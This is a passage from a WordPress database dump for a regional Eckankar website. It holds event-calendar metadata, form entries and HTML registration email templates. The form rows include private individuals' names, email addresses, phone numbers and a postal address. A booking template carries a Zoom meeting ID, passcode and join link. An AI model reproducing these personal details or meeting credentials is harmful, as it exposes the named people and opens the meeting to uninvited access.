ECKANKAR FELLOWSHIP / AFFILIATION . '),(192166,269115,'_field_138','HELP US WITH THE ECKANKAR FELLOWSHIP / AFFILIATION . \n\nFRED MUGAMBI IBURI . \n\nP . O . BOX 989 - 60300 . \n\nISIOLO . \n\nKENYA . \n\nE - fkurichia@yahoo.com\n\nC - FRED - +254710720070 / +254735287247 . '),(192167,269115,'_form_id','13'),(192168,269115,'_seq_num','146'),(192169,269116,'_field_654','Elaine '),(192170,269116,'_field_652','Dahlgren'),(192171,269116,'_field_653','elainedahl@yahoo.com'),(192172,269116,'_field_651','(801) 674-5348'),(192173,269116,'_field_656','The Master 4 Discourses - STARTS IN NOVEMBER -- 2nd Sunday at 845  1000 am - Temple-Hybrid'),(192174,269116,'_field_649','Francis\nLooks like you will be helping me again this year!  \nElaine'),(192175,269116,'_form_id','61'),(192176,269116,'_seq_num','14'),(192177,269118,'protect_children',''),(192178,269118,'mec_color',''),(192179,269118,'mec_location_id','200'),(192180,269118,'mec_dont_show_map','0'),(192181,269118,'mec_organizer_id','1'),(192182,269118,'mec_read_more',''),(192183,269118,'mec_more_info',''),(192184,269118,'mec_more_info_title',''),(192185,269118,'mec_more_info_target','_self'),(192186,269118,'mec_cost',''),(192187,269118,'mec_currency','a:0:{}'),(192188,269118,'mec_additional_organizer_ids','a:0:{}'),(192189,269118,'mec_additional_location_ids','a:0:{}'),(192190,269118,'mec_date','a:4:{s:5:\"start\";a:4:{s:4:\"date\";s:10:\"2023-10-28\";s:4:\"hour\";s:1:\"2\";s:7:\"minutes\";s:2:\"30\";s:4:\"ampm\";s:2:\"PM\";}s:3:\"end\";a:4:{s:4:\"date\";s:10:\"2023-10-28\";s:4:\"hour\";s:1:\"3\";s:7:\"minutes\";s:2:\"45\";s:4:\"ampm\";s:2:\"PM\";}s:7:\"comment\";s:0:\"\";s:6:\"repeat\";a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}}'),(192191,269118,'mec_repeat','a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}'),(192192,269118,'mec_certain_weekdays','a:0:{}'),(192193,269118,'mec_allday','0'),(192194,269118,'one_occurrence','0'),(192195,269118,'mec_hide_time','0'),(192196,269118,'mec_hide_end_time','0'),(192197,269118,'mec_comment',''),(192198,269118,'mec_timezone','global'),(192199,269118,'mec_countdown_method','global'),(192200,269118,'mec_public','1'),(192201,269118,'mec_start_date','2023-10-28'),(192202,269118,'mec_start_time_hour','2'),(192203,269118,'mec_start_time_minutes','30'),(192204,269118,'mec_start_time_ampm','PM'),(192205,269118,'mec_start_day_seconds','52200'),(192206,269118,'mec_end_date','2023-10-28'),(192207,269118,'mec_end_time_hour','3'),(192208,269118,'mec_end_time_minutes','45'),(192209,269118,'mec_end_time_ampm','PM'),(192210,269118,'mec_end_day_seconds','56700'),(192211,269118,'mec_repeat_status','0'),(192212,269118,'mec_repeat_type',''),(192213,269118,'mec_repeat_interval','1'),(192214,269118,'mec_repeat_end',''),(192215,269118,'mec_repeat_end_at_occurrences','9'),(192216,269118,'mec_repeat_end_at_date',''),(192217,269118,'mec_advanced_days','a:0:{}'),(192218,269118,'mec_in_days',''),(192219,269118,'mec_not_in_days',''),(192220,269118,'mec_hourly_schedules','a:0:{}'),(192221,269118,'mec_booking','a:19:{s:24:\"bookings_limit_unlimited\";s:1:\"0\";s:14:\"bookings_limit\";s:0:\"\";s:28:\"bookings_minimum_per_booking\";s:1:\"1\";s:28:\"roles_discount_administrator\";s:0:\"\";s:21:\"roles_discount_editor\";s:0:\"\";s:21:\"roles_discount_author\";s:0:\"\";s:26:\"roles_discount_contributor\";s:0:\"\";s:25:\"roles_discount_subscriber\";s:0:\"\";s:24:\"roles_discount_organizer\";s:0:\"\";s:25:\"roles_discount_uram_guest\";s:0:\"\";s:24:\"bookings_all_occurrences\";s:1:\"0\";s:33:\"bookings_all_occurrences_multiple\";s:1:\"0\";s:26:\"show_booking_form_interval\";s:0:\"\";s:35:\"stop_selling_after_first_occurrence\";s:1:\"0\";s:11:\"auto_verify\";s:6:\"global\";s:12:\"auto_confirm\";s:6:\"global\";s:29:\"bookings_booking_button_label\";s:0:\"\";s:29:\"bookings_user_limit_unlimited\";s:1:\"1\";s:19:\"bookings_user_limit\";s:0:\"\";}'),(192222,269118,'mec_tickets','a:0:{}'),(192223,269118,'mec_fees_global_inheritance','1'),(192224,269118,'mec_fees','a:0:{}'),(192225,269118,'mec_ticket_variations_global_inheritance','1'),(192226,269118,'mec_ticket_variations','a:0:{}'),(192227,269118,'mec_reg_fields_global_inheritance','1'),(192228,269118,'mec_reg_fields','a:0:{}'),(192229,269118,'mec_bfixed_fields','a:0:{}'),(192230,269118,'mec_op','a:0:{}'),(192231,269118,'mec_fields','a:0:{}'),(192232,269118,'mec_event_status','EventScheduled'),(192233,269118,'mec_moved_online_link',''),(192234,269118,'mec_cancelled_reason',''),(192235,269118,'mec_display_cancellation_reason_in_single_page',''),(192236,269118,'boldgrid_hide_page_title','0'),(192237,269118,'mec_notifications','a:3:{s:20:\"booking_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:0:\"\";s:7:\"content\";s:0:\"\";}s:18:\"email_verification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:27:\"Please verify your booking.\";s:7:\"content\";s:153:\"<p>Hi %%name%%,</p>\r\n<p>Please verify your booking by clicking on following link:</p>\r\n<p>%%verification_link%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:18:\"admin_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:26:\"A new booking is received.\";s:7:\"content\";s:195:\"<p>Dear Admin,</p>\r\n<p>A new booking is received. Please check and confirm it as soon as possible.</p>\r\n<p>%%admin_link%%</p>\r\n<p>%%attendees_full_info%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}}'),(192238,269118,'passster_activate_global_protection',''),(192239,269118,'passster_activate_protection',''),(192240,269118,'passster_protection_type','password'),(192241,269118,'boldgrid_in_page_containers','1'),(192242,269118,'_dp_original','265240'),(192243,269118,'_edit_lock','1695736081:15'),(192244,269118,'passster_area_shortcode',''),(192245,269118,'_edit_last','15'),(192246,269118,'_wp_old_date','2023-01-14'),(192247,269118,'mec_cost_auto_calculate','0'),(192248,269118,'mec_style_per_event','global'),(192249,269118,'mec_trailer_url',''),(192250,269118,'mec_trailer_title',''),(192251,269118,'mec_start_datetime','2023-10-28 02:30 PM'),(192252,269118,'mec_end_datetime','2023-10-28 03:45 PM'),(192253,269118,'mec_sequence','21'),(192254,269118,'mec_event_gallery','a:0:{}'),(192255,269118,'mec_related_events','a:0:{}'),(192256,269118,'mec_banner','a:0:{}'),(192257,269119,'_wp_attached_file','2023/09/GoldenHeart2.webp'),(192258,269119,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:600;s:6:\"height\";i:337;s:4:\"file\";s:25:\"2023/09/GoldenHeart2.webp\";s:8:\"filesize\";i:10404;s:5:\"sizes\";a:7:{s:6:\"medium\";a:5:{s:4:\"file\";s:25:\"GoldenHeart2-350x196.webp\";s:5:\"width\";i:350;s:6:\"height\";i:196;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:3606;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:25:\"GoldenHeart2-150x150.webp\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:1796;}s:9:\"thumblist\";a:5:{s:4:\"file\";s:25:\"GoldenHeart2-300x300.webp\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:3782;}s:12:\"thumbrelated\";a:5:{s:4:\"file\";s:25:\"GoldenHeart2-500x337.webp\";s:5:\"width\";i:500;s:6:\"height\";i:337;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:6162;}s:16:\"meccarouselthumb\";a:5:{s:4:\"file\";s:25:\"GoldenHeart2-474x324.webp\";s:5:\"width\";i:474;s:6:\"height\";i:324;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:5534;}s:10:\"gridsquare\";a:5:{s:4:\"file\";s:25:\"GoldenHeart2-391x260.webp\";s:5:\"width\";i:391;s:6:\"height\";i:260;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:4326;}s:8:\"tileview\";a:5:{s:4:\"file\";s:25:\"GoldenHeart2-300x337.webp\";s:5:\"width\";i:300;s:6:\"height\";i:337;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:4182;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(192259,269118,'_thumbnail_id','269119'),(194086,269259,'mec_event_status','EventScheduled'),(194087,269259,'mec_moved_online_link',''),(194088,269259,'mec_cancelled_reason',''),(194089,269259,'mec_display_cancellation_reason_in_single_page',''),(194090,269259,'protect_children',''),(194091,269259,'passster_activate_global_protection',NULL),(194092,269259,'passster_activate_protection',NULL),(194093,269259,'passster_protection_type','password'),(194094,269259,'boldgrid_hide_page_title','0'),(194095,269259,'_thumbnail_id','266063'),(194096,269259,'_oembed_ace4d65561aa575fe8833c60d61f4161','{{unknown}}'),(194097,269259,'boldgrid_in_page_containers','1'),(194110,269259,'_dp_original','266545'),(194099,269259,'passster_area_shortcode',''),(194100,269259,'mec_cost_auto_calculate','0'),(194101,269259,'mec_style_per_event','global'),(194102,269259,'mec_trailer_url',''),(194103,269259,'mec_trailer_title',''),(194104,269259,'mec_start_datetime','2023-11-05 10:30 AM'),(194105,269259,'mec_end_datetime','2023-11-05 11:30 PM'),(194106,269259,'mec_sequence','9'),(194107,269259,'mec_event_gallery','a:0:{}'),(194108,269259,'mec_related_events','a:0:{}'),(194109,269259,'mec_banner','a:0:{}'),(194111,269259,'_edit_lock','1698549291:2'),(194112,269259,'_edit_last','2'),(194113,269260,'mec_color',''),(194114,269260,'mec_location_id','129'),(194115,269260,'mec_dont_show_map','0'),(194116,269260,'mec_organizer_id','1'),(194117,269260,'mec_read_more',''),(194118,269260,'mec_more_info',''),(194119,269260,'mec_more_info_title',''),(194120,269260,'mec_more_info_target','_self'),(194121,269260,'mec_cost',''),(194122,269260,'mec_currency','a:0:{}'),(194123,269260,'mec_additional_organizer_ids','a:0:{}'),(194124,269260,'mec_additional_location_ids','a:0:{}'),(194125,269260,'mec_date','a:4:{s:5:\"start\";a:4:{s:4:\"date\";s:10:\"2023-11-12\";s:4:\"hour\";s:2:\"10\";s:7:\"minutes\";s:2:\"30\";s:4:\"ampm\";s:2:\"AM\";}s:3:\"end\";a:4:{s:4:\"date\";s:10:\"2023-11-12\";s:4:\"hour\";s:2:\"11\";s:7:\"minutes\";s:2:\"30\";s:4:\"ampm\";s:2:\"AM\";}s:7:\"comment\";s:0:\"\";s:6:\"repeat\";a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}}'),(194126,269260,'mec_repeat','a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}'),(194127,269260,'mec_certain_weekdays','a:0:{}'),(194128,269260,'mec_allday','0'),(194129,269260,'one_occurrence','0'),(194130,269260,'mec_hide_time','0'),(194131,269260,'mec_hide_end_time','0'),(194132,269260,'mec_comment',''),(194133,269260,'mec_timezone','global'),(194134,269260,'mec_countdown_method','global'),(194135,269260,'mec_public','1'),(194136,269260,'mec_start_date','2023-11-12'),(194137,269260,'mec_start_time_hour','10'),(194138,269260,'mec_start_time_minutes','30'),(194139,269260,'mec_start_time_ampm','AM'),(194140,269260,'mec_start_day_seconds','37800'),(194141,269260,'mec_end_date','2023-11-12'),(194142,269260,'mec_end_time_hour','11'),(194143,269260,'mec_end_time_minutes','30'),(194144,269260,'mec_end_time_ampm','AM'),(194145,269260,'mec_end_day_seconds','41400'),(194146,269260,'mec_repeat_status','0'),(194147,269260,'mec_repeat_type',''),(194148,269260,'mec_repeat_interval','1'),(194149,269260,'mec_repeat_end',''),(194150,269260,'mec_repeat_end_at_occurrences','9'),(194151,269260,'mec_repeat_end_at_date',''),(194152,269260,'mec_advanced_days','a:0:{}'),(194153,269260,'mec_in_days',''),(194154,269260,'mec_not_in_days',''),(194155,269260,'mec_hourly_schedules','a:0:{}'),(194156,269260,'mec_booking','a:19:{s:24:\"bookings_limit_unlimited\";s:1:\"1\";s:14:\"bookings_limit\";s:0:\"\";s:28:\"bookings_minimum_per_booking\";s:1:\"1\";s:28:\"roles_discount_administrator\";s:0:\"\";s:21:\"roles_discount_editor\";s:0:\"\";s:21:\"roles_discount_author\";s:0:\"\";s:26:\"roles_discount_contributor\";s:0:\"\";s:25:\"roles_discount_subscriber\";s:0:\"\";s:24:\"roles_discount_organizer\";s:0:\"\";s:25:\"roles_discount_uram_guest\";s:0:\"\";s:24:\"bookings_all_occurrences\";s:1:\"0\";s:33:\"bookings_all_occurrences_multiple\";s:1:\"0\";s:26:\"show_booking_form_interval\";s:0:\"\";s:35:\"stop_selling_after_first_occurrence\";s:1:\"0\";s:11:\"auto_verify\";s:6:\"global\";s:12:\"auto_confirm\";s:6:\"global\";s:29:\"bookings_booking_button_label\";s:0:\"\";s:29:\"bookings_user_limit_unlimited\";s:1:\"1\";s:19:\"bookings_user_limit\";s:0:\"\";}'),(194157,269260,'mec_tickets','a:1:{i:1;a:21:{s:4:\"name\";s:27:\"ECK Light and Sound Service\";s:22:\"ticket_start_time_hour\";s:2:\"10\";s:24:\"ticket_start_time_minute\";s:2:\"30\";s:22:\"ticket_start_time_ampm\";s:2:\"AM\";s:20:\"ticket_end_time_hour\";s:2:\"11\";s:22:\"ticket_end_time_minute\";s:2:\"30\";s:20:\"ticket_end_time_ampm\";s:2:\"PM\";s:11:\"description\";s:13:\"Register Here\";s:19:\"private_description\";s:0:\"\";s:5:\"price\";s:1:\"0\";s:11:\"price_label\";s:0:\"\";s:5:\"limit\";s:0:\"\";s:9:\"unlimited\";s:1:\"1\";s:5:\"seats\";s:1:\"1\";s:14:\"minimum_ticket\";s:1:\"1\";s:14:\"maximum_ticket\";s:0:\"\";s:18:\"stop_selling_value\";s:1:\"0\";s:17:\"stop_selling_type\";s:4:\"hour\";s:5:\"dates\";a:0:{}s:12:\"category_ids\";a:0:{}s:2:\"id\";i:1;}}'),(194158,269260,'mec_fees_global_inheritance','1'),(194159,269260,'mec_fees','a:0:{}'),(194160,269260,'mec_ticket_variations_global_inheritance','1'),(194161,269260,'mec_ticket_variations','a:0:{}'),(194162,269260,'mec_reg_fields_global_inheritance','1'),(194163,269260,'mec_reg_fields','a:0:{}'),(194164,269260,'mec_bfixed_fields','a:0:{}'),(194165,269260,'mec_op','a:0:{}'),(194166,269260,'mec_fields','a:0:{}'),(194167,269260,'mec_notifications','a:4:{s:20:\"booking_notification\";a:3:{s:6:\"status\";s:1:\"1\";s:7:\"subject\";s:27:\"Eckankar Event Registration\";s:7:\"content\";s:5373:\"<div role=\"article\" aria-roledescription=\"email\" style=\"text-size-adjust: 100%; -webkit-text-size-adjust: 100%; -ms-text-size-adjust: 100%; background-color: #ffffff;\" lang=\"en\">\r\n<table style=\"width: 100%; border: none; border-spacing: 0;\" role=\"presentation\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding: 0;\" align=\"center\"><!-- [if mso]></p>\r\n<table role=\"presentation\" align=\"center\" style=\"width:600px;\">\r\n<tr>\r\n<td>\r\n<p>          <![endif]-->\r\n<table style=\"width: 94%; max-width: 600px; border: none; border-spacing: 0; text-align: left; font-family: Arial,sans-serif; font-size: 16px; line-height: 22px; color: #363636;\" role=\"presentation\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding: 20px 0px 10px 0px; background-color: #ffffff; text-align: center; border-bottom: 1px solid #ccc; border-width: 70%; line-height: 50px;\"><img class=\"alignnone size-full wp-image-266555\" src=\"https://eckankar-colorado.org/wp-content/uploads/2022/04/email-img-registration-600-5.jpg\" alt=\"\" width=\"602\" height=\"302\" /></td>\r\n</tr>\r\n<tr>\r\n<td style=\"padding: 10px 20px 10px 20px; background-color: #f5f5f5; text-align: center; border-bottom: 1px solid #ccc; border-width: 70%; line-height: 50px;\">\r\n<p style=\"margin: 0;\"><span style=\"color: #f28a27; font-size: 30px; font-family: arial, helvetica, sans-serif;\"><strong>Event Registration Confirmation</strong></span></p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"padding: 20px 10px 10px 10px; font-size: 0; background-color: #ffffff; border-bottom: 1px solid #f0f0f5; border-color: rgba(201,201,207,.35);\"><!-- [if mso]></p>\r\n<table role=\"presentation\" width=\"100%\">\r\n<tr>\r\n<td style=\"width:145px; padding: 15px 10px 11px 10px;\" align=\"left\" valign=\"top\">\r\n<p>                <![endif]-->\r\n<div class=\"col-lge\" style=\"display: inline-block; width: 100%; max-width: 500px; vertical-align: top; padding-bottom: 20px; font-family: Arial,sans-serif; font-size: 18px; line-height: 22px; color: #363636;\">\r\n<p style=\"margin-top: 0; margin-bottom: 12px; font-size: 22px;\"><b>Hello %%first_name%% and thank you for registering!</b></p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px; font-size: 20px;\">You are signed up for the following online event:</p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px; font-size: 18px;\"><b><span style=\"color: #f28a27;\">Title: </span>%%event_title%%</b></p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px; font-size: 18px;\"><b style=\"color: #f28a27;\">Date: </b>%%event_start_date%%</p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px; font-size: 18px;\"><b style=\"color: #f28a27;\">Time: </b>%%event_start_time%%</p>\r\n<p style=\"margin-top: 0; margin-bottom: 15px;\"> </p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px; font-size: 22px; color: #f28a27;\"><b>Zoom Login Information:</b></p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px;\"><b>Meeting ID: </b>834 9746 0655<br />\r\n<b>Passcode:</b> 867156</p>\r\n<p style=\"margin-top: 0; margin-bottom: 20px;\"><a href=\"https://us02web.zoom.us/j/83497460655?pwd=QUhmSC9NZHg1YlVwZWFtc0JjZDEzdz09\">https://us02web.zoom.us/j/83497460655?pwd=QUhmSC9NZHg1YlVwZWFtc0JjZDEzdz09</a></p>\r\n<p style=\"margin-top: 0; margin-bottom: 20px;\"><b>Dial-in number: </b>720-707-2699 (for those who need to join by phone)</p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px;\">After you click the link, you will be prompted to either download the app to enter the meeting or enter through your browser. Please note that Zoom works best if you download the app. It is more stable and has more functions. Select use computer audio for sound.</p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px;\">Please join the meeting 5 - 10 minutes ahead of time to help us start on time. We look forward to seeing you at this online event.</p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px;\">See you there!</p>\r\n</div>\r\n<p><!-- [if mso]>\r\n                </td>\r\n</tr>\r\n</table>\r\n<p>                <![endif]--></p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"padding: 20px; font-size: 16px; line-height: 28px; background-color: #efefef; border-bottom: 1px solid #f0f0f5; border-color: rgba(201,201,207,.35); text-align: center;\">You are receiving this email because you have submitted a request through the <a href=\"https://eckankar-colorado.org/\">Eckankar in Colorado</a> website. If you have any questions regarding the origin of this email, please feel free to get in touch, we\'re always happy to help out.</td>\r\n</tr>\r\n<tr>\r\n<td style=\"padding: 10px; background-color: #6e6e6e;\">\r\n<figure style=\"text-align: center;\"><span style=\"font-family: arial, helvetica, sans-serif;\"><img src=\"https://eckankar-colorado.org/wp-content/uploads/2021/05/fb-icon-email.png\" alt=\"f\" width=\"40\" height=\"40\" /> </span></figure>\r\n<figure style=\"text-align: center;\"><span style=\"font-size: 14px; line-height: 20px; color: #cccccc; margin: 0px; font-family: arial, helvetica, sans-serif;\">© Eckankar In Colorado -2022</span><br />\r\n<span style=\"font-family: arial, helvetica, sans-serif;\"><a title=\"Contact Us\" href=\"mailto:webmaster@eckankar-colorado.org\"><span style=\"font-size: 14px; line-height: 20px; text-decoration-line: underline; text-decoration-style: solid; text-decoration-color: currentcolor; text-decoration-thickness: auto; color: #cccccc; margin: 0px;\">Contact Us</span></a></span></figure>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<p><!-- [if mso]>\r\n          </td>\r\n</tr>\r\n</table>\r\n<p>          <![endif]--></p>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\";}s:18:\"email_verification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:27:\"Please verify your booking.\";s:7:\"content\";s:153:\"<p>Hi %%name%%,</p>\r\n<p>Please verify your booking by clicking on following link:</p>\r\n<p>%%verification_link%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:18:\"admin_notification\";a:3:{s:6:\"status\";s:1:\"1\";s:7:\"subject\";s:22:\"New Event Registration\";s:7:\"content\";s:4031:\"<div role=\"article\" aria-roledescription=\"email\" style=\"text-size-adjust: 100%; -webkit-text-size-adjust: 100%; -ms-text-size-adjust: 100%; background-color: #ffffff;\" lang=\"en\">\r\n<table style=\"width: 100%; border: none; border-spacing: 0;\" role=\"presentation\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding: 0;\" align=\"center\"><!-- [if mso]></p>\r\n<table role=\"presentation\" align=\"center\" style=\"width:600px;\">\r\n<tr>\r\n<td>\r\n<p>          <![endif]-->\r\n<table style=\"width: 94%; max-width: 600px; border: none; border-spacing: 0; text-align: left; font-family: Arial,sans-serif; font-size: 16px; line-height: 22px; color: #363636;\" role=\"presentation\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding: 20px 0px 10px 0px; background-color: #ffffff; text-align: center; border-bottom: 1px solid #ccc; border-width: 70%; line-height: 50px;\"><strong><span style=\"color: #1d5791; font-family: arial, helvetica, sans-serif; font-size: 36px; text-decoration-line: underline; text-decoration-style: solid; text-decoration-color: currentcolor; text-decoration-thickness: auto;\">Admin Notification</span></strong></td>\r\n</tr>\r\n<tr>\r\n<td style=\"padding: 10px 20px 10px 20px; background-color: #f5f5f5; text-align: center; border-bottom: 1px solid #ccc; border-width: 70%; line-height: 50px;\">\r\n<p style=\"margin: 0;\"><span style=\"color: #707172; font-size: 30px; font-family: arial, helvetica, sans-serif;\"><strong>New Event Registration</strong></span></p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"padding: 20px 10px 10px 10px; font-size: 0; background-color: #ffffff; border-bottom: 1px solid #f0f0f5; border-color: rgba(201,201,207,.35);\"><!-- [if mso]></p>\r\n<table role=\"presentation\" width=\"100%\">\r\n<tr>\r\n<td style=\"width:145px; padding: 15px 10px 11px 10px;\" align=\"left\" valign=\"top\">\r\n<p>                <![endif]-->\r\n<div class=\"col-lge\" style=\"display: inline-block; width: 100%; max-width: 500px; vertical-align: top; padding-bottom: 20px; font-family: Arial,sans-serif; font-size: 18px; line-height: 22px; color: #363636;\"><span style=\"font-size: 20px; color: #333333;\"><strong>A new registration has been submitted for the following event:</strong></span></div>\r\n<div class=\"col-lge\" style=\"display: inline-block; width: 100%; max-width: 500px; vertical-align: top; padding-bottom: 20px; font-family: Arial,sans-serif; font-size: 18px; line-height: 22px; color: #363636;\"><br />\r\n<div style=\"font-family: inherit; text-align: inherit;\"><span style=\"font-size: 19px; color: #23507d;\"><strong>%%event_title%%</strong></span></div>\r\n<div></div>\r\n<div style=\"font-family: inherit; text-align: inherit;\"><span style=\"font-size: 19px; color: #23507d;\"><strong>Date: </strong></span><span style=\"font-size: 19px; color: #333333;\"><strong>%%event_start_date%%</strong></span></div>\r\n<div style=\"font-family: inherit; text-align: inherit;\"><span style=\"font-size: 19px; color: #23507d;\"><strong>Time: </strong></span><span style=\"font-size: 19px; color: #333333;\"><strong>%%event_start_time%%</strong></span></div>\r\n</div>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"padding: 20px; font-size: 16px; line-height: 28px; background-color: #efefef; border-bottom: 1px solid rgba(201, 201, 207, 0.35); border-top-color: rgba(201, 201, 207, 0.35); border-right-color: rgba(201, 201, 207, 0.35); border-left-color: rgba(201, 201, 207, 0.35); text-align: left;\"><span style=\"font-size: 14pt;\">%%attendees_full_info%%</span></td>\r\n</tr>\r\n<tr>\r\n<td style=\"padding: 10px; background-color: #6e6e6e;\">\r\n<figure style=\"text-align: center;\"><span style=\"font-family: arial, helvetica, sans-serif;\"><img src=\"https://eckankar-colorado.org/wp-content/uploads/2021/05/fb-icon-email.png\" alt=\"f\" width=\"40\" height=\"40\" /> </span></figure>\r\n<figure style=\"text-align: center;\"><span style=\"font-size: 14px; line-height: 20px; color: #cccccc; margin: 0px; font-family: arial, helvetica, sans-serif;\">© Eckankar In Colorado -2022</span></figure>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<p><!-- [if mso]>\r\n          </td>\r\n</tr>\r\n</table>\r\n<p>          <![endif]--></p>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\";}s:16:\"certificate_send\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:27:\"Event Attendee Certificates\";s:7:\"content\";s:252:\"<p>Hi %%name%%,</p>\r\n<p>Congratulations for successfully attending / completing the event %%event_title%%.<br />\r\nClick the following link to download or print your PDF certificate.</p>\r\n<p>%%certificate_link%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}}'),(194168,269260,'mec_event_status','EventScheduled'),(194169,269260,'mec_moved_online_link',''),(194170,269260,'mec_cancelled_reason',''),(194171,269260,'mec_display_cancellation_reason_in_single_page',''),(194172,269260,'protect_children',''),(194173,269260,'passster_activate_global_protection',NULL),(194174,269260,'passster_activate_protection',NULL),(194175,269260,'passster_protection_type','password'),(194176,269260,'boldgrid_hide_page_title','0'),(194177,269260,'_oembed_ace4d65561aa575fe8833c60d61f4161','{{unknown}}'),(194178,269260,'boldgrid_in_page_containers','1'),(194193,269260,'_dp_original','266540'),(194180,269260,'_thumbnail_id','268151'),(194181,269260,'_wp_old_date','2022-04-30'),(194182,269260,'passster_area_shortcode',''),(194183,269260,'mec_cost_auto_calculate','0'),(194184,269260,'mec_style_per_event','global'),(194185,269260,'mec_trailer_url',''),(194186,269260,'mec_trailer_title',''),(194187,269260,'mec_start_datetime','2023-11-12 10:30 AM'),(194188,269260,'mec_end_datetime','2023-11-12 11:30 AM'),(194189,269260,'mec_sequence','16'),(194190,269260,'mec_event_gallery','a:0:{}'),(194191,269260,'mec_related_events','a:0:{}'),(194192,269260,'mec_banner','a:0:{}'),(194194,269260,'_edit_lock','1699827092:2'),(194195,269260,'_edit_last','2'),(194196,269262,'protect_children',''),(194197,269262,'mec_color',''),(194198,269262,'mec_location_id','171'),(194199,269262,'mec_dont_show_map','0'),(194200,269262,'mec_organizer_id','1'),(194201,269262,'mec_read_more',''),(194202,269262,'mec_more_info',''),(194203,269262,'mec_more_info_title',''),(194204,269262,'mec_more_info_target','_self'),(194205,269262,'mec_cost',''),(194206,269262,'mec_currency','a:0:{}'),(194207,269262,'mec_additional_organizer_ids','a:0:{}'),(194208,269262,'mec_additional_location_ids','a:0:{}'),(194209,269262,'mec_date','a:4:{s:5:\"start\";a:4:{s:4:\"date\";s:10:\"2023-11-16\";s:4:\"hour\";s:1:\"7\";s:7:\"minutes\";s:1:\"0\";s:4:\"ampm\";s:2:\"PM\";}s:3:\"end\";a:4:{s:4:\"date\";s:10:\"2023-11-16\";s:4:\"hour\";s:1:\"8\";s:7:\"minutes\";s:1:\"0\";s:4:\"ampm\";s:2:\"PM\";}s:7:\"comment\";s:0:\"\";s:6:\"repeat\";a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}}'),(194210,269262,'mec_repeat','a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}'),(194211,269262,'mec_certain_weekdays','a:0:{}'),(194212,269262,'mec_allday','0'),(194213,269262,'one_occurrence','0'),(194214,269262,'mec_hide_time','0'),(194215,269262,'mec_hide_end_time','0'),(194216,269262,'mec_comment',''),(194217,269262,'mec_timezone','global'),(194218,269262,'mec_countdown_method','global'),(194219,269262,'mec_public','1'),(194220,269262,'mec_start_date','2023-1